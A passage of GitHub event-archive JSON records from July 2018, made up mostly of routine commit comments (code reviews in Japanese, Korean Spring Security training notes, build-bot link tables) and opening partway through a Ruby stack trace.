you don't know how to fix it, please submit a GitHub issue, we will try to help you: https://github.com/yegor256/pdd/issues. This tool is still in its beta version and we will appreciate your feedback. Here is where you can find more documentation: https://github.com/yegor256/pdd/blob/master/README.md.\nExit code is 1\n\n/app/objects/git_repo.rb:66:in `rescue in block in xml'\n/app/objects/git_repo.rb:63:in `block in xml'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/tempfile.rb:295:in `open'\n/app/objects/git_repo.rb:62:in `xml'\n/app/objects/puzzles.rb:36:in `deploy'\n/app/objects/job.rb:38:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-05T12:34:42Z"}
{"id":"7922926614","type":"CommitCommentEvent","actor":{"login":"donggyushin"},"repo":{"name":"donggyushin/Security-Training"},"payload":{"comment":{"id":29605813,"position":null,"line":null,"path":null,"commit_id":"b8454e87c5bd36ec8d5e874d0a2cd41fafb1e78e","created_at":"2018-07-05T12:34:43Z","updated_at":"2018-07-05T12:34:43Z","author_association":"OWNER","body":"Maven 혹은 gradle에 security 설정을 넣어준다(spring-boot-starter-security). 앱을 다시 실행하면 기본값으로 작동하며, 사이트 전체가 잠겨(인증필수 페이지로 변함)버립니다. 대부분의 사이트는 개인정보에 접근하는 계정정보, 결제이력, 글쓰기등 회원과 관련된 부분이 아니라면 기본적으로 로그인이 필요없습니다.\r\n하지만 스프링 시큐리티 같은경우는 기본적으로 모두 인증페이지이며 일부를 열어주는 형태로 되어있습니다.\r\n\r\nSecurity 설정 클래스에 모든 경로에 web.ignoring() 을 주어서 인증을 모두 풀어주었습니다."}},"created_at":"2018-07-05T12:34:43Z"}
{"id":"7922936332","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29605835,"position":null,"line":null,"path":null,"commit_id":"def533ab106384b2859d56b6a1d18a26ec880136","created_at":"2018-07-05T12:36:41Z","updated_at":"2018-07-05T12:36:41Z","author_association":"NONE","body":"全体的に、特別な理由がなければ空の行は2行以上空けないようにしてください。\r\nまた、代入のイコールや、演算子(+, -, *, /など)は前後両方にスペースを入れると美しくなります。\r\n\r\nhanaya-var.py\r\nちょっと細かいですが、\r\nrateに(1 - 0.1)を代入しています。個人的にはこれは「割引率」というより\r\n「割り引いた結果の率」と思います。\r\n計算結果的にはOKです。"}},"created_at":"2018-07-05T12:36:41Z"}
{"id":"7922936574","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29605836,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-05T12:36:44Z","updated_at":"2018-07-05T12:36:44Z","author_association":"COLLABORATOR","body":"> Subquestion codes are validated during tsv import, so it won't work. Feel free to test.\r\n\r\nYes , subquestion code validated, but rules didn't force to start with an alpha …"}},"created_at":"2018-07-05T12:36:44Z"}
{"id":"7922936592","type":"CommitCommentEvent","actor":{"login":"sandeepsw"},"repo":{"name":"amar-shieldwatch/test"},"payload":{"comment":{"id":29605837,"position":null,"line":null,"path":null,"commit_id":"158d8db26c78f0feeb04679a9469a2df87d9d641","created_at":"2018-07-05T12:36:44Z","updated_at":"2018-07-05T12:36:44Z","author_association":"COLLABORATOR","body":"made some changes"}},"created_at":"2018-07-05T12:36:44Z"}
{"id":"7922942392","type":"CommitCommentEvent","actor":{"login":"lkreimann"},"repo":{"name":"plentymarkets/plugin-ceres"},"payload":{"comment":{"id":29605855,"position":null,"line":null,"path":null,"commit_id":"e625bdb4178735241ecd1a2fc25a6b05e9fd6cc3","created_at":"2018-07-05T12:37:54Z","updated_at":"2018-07-05T12:37:54Z","author_association":"NONE","body":"Mir wird hier nicht ganz klar, wie in der `Template.properties` nun der Firmenname überschrieben wird. Ist zwar schon etwas älter dieser Commit aber übernehme das gerade erst in unserem Theme-Template :D \r\nWenn es jetzt nicht mehr über die config-Datei geht, wie läuft es denn dann?"}},"created_at":"2018-07-05T12:37:54Z"}
{"id":"7922943326","type":"CommitCommentEvent","actor":{"login":"barrbrain"},"repo":{"name":"barrbrain/aomanalyzer"},"payload":{"comment":{"id":29605861,"position":35,"line":1759,"path":"src/components/Analyzer.tsx","commit_id":"ec8910b683274ef16d2ccbccabee1bec153a3d59","created_at":"2018-07-05T12:38:06Z","updated_at":"2018-07-05T12:38:06Z","author_association":"OWNER","body":"`frame.json[\"uv_modeMap\"].UV_CFL_PRED`"}},"created_at":"2018-07-05T12:38:06Z"}
{"id":"7922943942","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29605863,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-05T12:38:12Z","updated_at":"2018-07-05T12:38:12Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux 32|Linux 64|macOS 64|\n|---|---|---|---|\n|Blender py36|[ifcblender-python-36-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux32.zip)|[ifcblender-python-36-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux64.zip)|[ifcblender-python-36-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-macos64.zip)|\n|IfcConvert|[IfcConvert-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux32.zip)|[IfcConvert-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux64.zip)|[IfcConvert-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-macos64.zip)|\n|IfcGeomServer|[IfcGeomServer-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux32.zip)|[IfcGeomServer-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux64.zip)|[IfcGeomServer-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-macos64.zip)|\n|Python 27|[ifcopenshell-python-27-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux32.zip)|[ifcopenshell-python-27-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux64.zip)|[ifcopenshell-python-27-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-macos64.zip)|\n|Python 27u|[ifcopenshell-python-27u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux32.zip)|[ifcopenshell-python-27u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux64.zip)|[ifcopenshell-python-27u-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-macos64.zip)|\n|Python 32|[ifcopenshell-python-32-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux32.zip)|[ifcopenshell-python-32-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux64.zip)|[ifcopenshell-python-32-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-macos64.zip)|\n|Python 32u|[ifcopenshell-python-32u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux32.zip)|[ifcopenshell-python-32u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux64.zip)|[ifcopenshell-python-32u-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-macos64.zip)|\n|Python 33|[ifcopenshell-python-33-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux32.zip)|[ifcopenshell-python-33-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux64.zip)|[ifcopenshell-python-33-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-macos64.zip)|\n|Python 34|[ifcopenshell-python-34-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux32.zip)|[ifcopenshell-python-34-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux64.zip)|[ifcopenshell-python-34-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-macos64.zip)|\n|Python 35|[ifcopenshell-python-35-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux32.zip)|[ifcopenshell-python-35-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux64.zip)|[ifcopenshell-python-35-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-macos64.zip)|\n|Python 36|[ifcopenshell-python-36-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux32.zip)|[ifcopenshell-python-36-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux64.zip)|[ifcopenshell-python-36-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-05T12:38:12Z"}
{"id":"7922944370","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29605867,"position":null,"line":null,"path":null,"commit_id":"09d20311d982606093ed881d779bb05a5ee70ed3","created_at":"2018-07-05T12:38:17Z","updated_at":"2018-07-05T12:38:17Z","author_association":"CONTRIBUTOR","body":"👍"}},"created_at":"2018-07-05T12:38:17Z"}
{"id":"7922945993","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29605868,"position":12,"line":99,"path":"application/models/Question.php","commit_id":"ae2a46cd5c33738b621bcd23360d8c4db7402830","created_at":"2018-07-05T12:38:36Z","updated_at":"2018-07-05T12:38:36Z","author_association":"COLLABORATOR","body":"See my comment : https://bugs.limesurvey.org/view.php?id=13845#c48453\r\n\r\n> can you provide the TSV file ? "}},"created_at":"2018-07-05T12:38:36Z"}
{"id":"7922954766","type":"CommitCommentEvent","actor":{"login":"shravyabss"},"repo":{"name":"shravyabss/New-repository1223"},"payload":{"comment":{"id":29605888,"position":null,"line":null,"path":null,"commit_id":"0d3ded2978dcbc7ac7d85f7b2fa703173c5b31ff","created_at":"2018-07-05T12:40:19Z","updated_at":"2018-07-05T12:40:19Z","author_association":"OWNER","body":"Initial commit is commented..."}},"created_at":"2018-07-05T12:40:19Z"}
{"id":"7922956916","type":"CommitCommentEvent","actor":{"login":"martinbean"},"repo":{"name":"facebook/php-graph-sdk"},"payload":{"comment":{"id":29605894,"position":null,"line":null,"path":null,"commit_id":"4a1c99fc2f2d263ca6cc6c8707788e1046568290","created_at":"2018-07-05T12:40:44Z","updated_at":"2018-07-05T12:40:44Z","author_association":"NONE","body":"What. On. Earth? How did that even make it into this repository in the first place? 😕 "}},"created_at":"2018-07-05T12:40:44Z"}
{"id":"7922962464","type":"CommitCommentEvent","actor":{"login":"Hchnr"},"repo":{"name":"Hchnr/VLC-qml2"},"payload":{"comment":{"id":29605903,"position":4,"line":1026,"path":"modules/gui/qt/components/interface_widgets.cpp","commit_id":"9a83df4724b6c3b5074f704d83f274462e8f2f1e","created_at":"2018-07-05T12:41:47Z","updated_at":"2018-07-05T12:41:47Z","author_association":"OWNER","body":"I see. I will try with Q_PROPERTY. And I should discard the QtWidget TimeLabel."}},"created_at":"2018-07-05T12:41:47Z"}
{"id":"7922963448","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18027/programming-term2"},"payload":{"comment":{"id":29605904,"position":null,"line":null,"path":null,"commit_id":"447908d9dcc0c862a506e999d0a27dbce9af125d","created_at":"2018-07-05T12:41:58Z","updated_at":"2018-07-05T12:41:58Z","author_association":"NONE","body":"全体的に綺麗で見やすいソースコードと思います。\r\nhanaya-var.pyについて\r\nコメント行が全てカットされていますが、今後コメント行も入れてくださいね。\r\n仕事でコードを書く場合、1人だけでメンテナンスすることは稀で、\r\n後から見た人が分かりやすいようにコメント入れておくと親切です。"}},"created_at":"2018-07-05T12:41:58Z"}
{"id":"7922964132","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwikisas/application-licensing"},"payload":{"comment":{"id":29605907,"position":null,"line":null,"path":null,"commit_id":"d977db5f7904b7562178a9769e5adf83dac17e03","created_at":"2018-07-05T12:42:07Z","updated_at":"2018-07-05T12:42:07Z","author_association":"COLLABORATOR","body":"I really don't like this.. We should simply use the ``email`` input type https://developer.mozilla.org/en-US/docs/Web/HTML/Element/input/email#Validation ."}},"created_at":"2018-07-05T12:42:07Z"}
{"id":"7922964307","type":"CommitCommentEvent","actor":{"login":"karthikkm007"},"repo":{"name":"BootleggersROM-Devices/device_treble_enabled"},"payload":{"comment":{"id":29605908,"position":null,"line":null,"path":null,"commit_id":"10aaed9bd2ec8df8e9891c7f717406a7cd7f9efe","created_at":"2018-07-05T12:42:09Z","updated_at":"2018-07-05T12:42:09Z","author_association":"NONE","body":"i have a 32 bit device ( Xiaomi Redmi 2 (wt88047)\r\n\r\nCan you make one arm build? i will test"}},"created_at":"2018-07-05T12:42:09Z"}
{"id":"7922967157","type":"CommitCommentEvent","actor":{"login":"YahiaAngelo"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29605916,"position":null,"line":null,"path":null,"commit_id":"c2a89bc69a3af9e8aa6d37f1fdaa16e3f6dc4514","created_at":"2018-07-05T12:42:42Z","updated_at":"2018-07-05T12:42:42Z","author_association":"NONE","body":"You can do this with an easier way by Editing WordAdapter Class,\r\nBy adding this : \r\n\r\n```\r\n        //Add OnClickListener to all items views\r\n        listItemView.setOnClickListener(new View.OnClickListener() {\r\n            @Override\r\n            public void onClick(View view) {\r\n                MediaPlayer mediaPlayer = MediaPlayer.create(getContext(), currentWord.getAudioResourceId());\r\n                mediaPlayer.start();\r\n                //Release the media player after it finishes playing\r\n                mediaPlayer.setOnCompletionListener(new MediaPlayer.OnCompletionListener() {\r\n                    @Override\r\n                    public void onCompletion(MediaPlayer mediaPlayer) {\r\n                        mediaPlayer.release();\r\n                    }\r\n                });\r\n            }\r\n        });\r\n```"}},"created_at":"2018-07-05T12:42:42Z"}
{"id":"7922967277","type":"CommitCommentEvent","actor":{"login":"shravyabss"},"repo":{"name":"shravyabss/New-repository1223"},"payload":{"comment":{"id":29605917,"position":null,"line":null,"path":null,"commit_id":"0d3ded2978dcbc7ac7d85f7b2fa703173c5b31ff","created_at":"2018-07-05T12:42:44Z","updated_at":"2018-07-05T12:42:44Z","author_association":"OWNER","body":"INitial"}},"created_at":"2018-07-05T12:42:44Z"}
{"id":"7922967758","type":"CommitCommentEvent","actor":{"login":"donggyushin"},"repo":{"name":"donggyushin/Security-Training"},"payload":{"comment":{"id":29605919,"position":null,"line":null,"path":null,"commit_id":"43b2b45a01690fa781dd44a87071c6d0854f9e5a","created_at":"2018-07-05T12:42:49Z","updated_at":"2018-07-05T12:42:49Z","author_association":"OWNER","body":"전체 사이트에 인증을 비활성화 시킨 후 mypage에만 부분 인증페이지 설정을 해주었습니다. 하지만 mypage에는 정상적으로 접속이 잘 됩니다. 아무래도 ignoring() 우선순위가 더욱 높은 것 같습니다. "}},"created_at":"2018-07-05T12:42:49Z"}
{"id":"7922968640","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29605921,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-05T12:42:59Z","updated_at":"2018-07-05T12:42:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T12:42:59Z"}
{"id":"7922969581","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18001-ikeshiro/programming-term2"},"payload":{"comment":{"id":29605922,"position":null,"line":null,"path":null,"commit_id":"ac33fd580bf62df1ac8b81d67c51732288838d8d","created_at":"2018-07-05T12:43:11Z","updated_at":"2018-07-05T12:43:11Z","author_association":"NONE","body":"全体的に綺麗で見やすいソースコードと思います。\r\n細かいですが、ギターはguitarです^^;"}},"created_at":"2018-07-05T12:43:11Z"}
{"id":"7922970805","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29605927,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-05T12:43:25Z","updated_at":"2018-07-05T12:43:25Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux 32|Linux 64|macOS 64|\n|---|---|---|---|\n|Blender py36|[ifcblender-python-36-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux32.zip)|[ifcblender-python-36-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux64.zip)|[ifcblender-python-36-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-macos64.zip)|\n|IfcConvert|[IfcConvert-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux32.zip)|[IfcConvert-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux64.zip)|[IfcConvert-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-macos64.zip)|\n|IfcGeomServer|[IfcGeomServer-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux32.zip)|[IfcGeomServer-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux64.zip)|[IfcGeomServer-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-macos64.zip)|\n|Python 27|[ifcopenshell-python-27-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux32.zip)|[ifcopenshell-python-27-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux64.zip)|[ifcopenshell-python-27-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-macos64.zip)|\n|Python 27u|[ifcopenshell-python-27u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux32.zip)|[ifcopenshell-python-27u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux64.zip)|[ifcopenshell-python-27u-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-macos64.zip)|\n|Python 32|[ifcopenshell-python-32-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux32.zip)|[ifcopenshell-python-32-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux64.zip)|[ifcopenshell-python-32-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-macos64.zip)|\n|Python 32u|[ifcopenshell-python-32u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux32.zip)|[ifcopenshell-python-32u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux64.zip)|[ifcopenshell-python-32u-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-macos64.zip)|\n|Python 33|[ifcopenshell-python-33-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux32.zip)|[ifcopenshell-python-33-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux64.zip)|[ifcopenshell-python-33-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-macos64.zip)|\n|Python 34|[ifcopenshell-python-34-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux32.zip)|[ifcopenshell-python-34-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux64.zip)|[ifcopenshell-python-34-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-macos64.zip)|\n|Python 35|[ifcopenshell-python-35-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux32.zip)|[ifcopenshell-python-35-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux64.zip)|[ifcopenshell-python-35-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-macos64.zip)|\n|Python 36|[ifcopenshell-python-36-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux32.zip)|[ifcopenshell-python-36-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux64.zip)|[ifcopenshell-python-36-master-6fdd204-macos64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-05T12:43:25Z"}
